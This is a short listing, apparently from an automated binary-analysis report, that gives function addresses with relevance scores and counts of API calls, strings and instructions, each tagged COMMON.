Function 6E1A2505, Relevance: 15.3, APIs: 10, Instructions: 253
COMMON

Function 6E1B3EDC, Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Function 6E1B00C7, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 496
COMMON

Function 6E1A1DC5, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 95
COMMON

Function 6E1A3009, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120
COMMON

Function 6E19FD9A, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 201
COMMON

Function 6E1A13D2, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 178
COMMON

Function 6E19ECE6, Relevance: 10.7, APIs: 7, Instructions: 151
COMMON

Function 6E19BA00, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Function 6E1A0004, Relevance: 10.6, APIs: 7, Instructions: 102
COMMON

Function 6E1A065C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85
COMMON

Function 6E1B15F6, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMON

Function 6E1C1208, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Function 6E199E41, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 57
COMMON

Function 6E1BAA03, Relevance: 9.3, APIs: 6, Instructions: 318
fileCOMMON

Function 6E1AE93D, Relevance: 9.2, APIs: 6, Instructions: 221
COMMON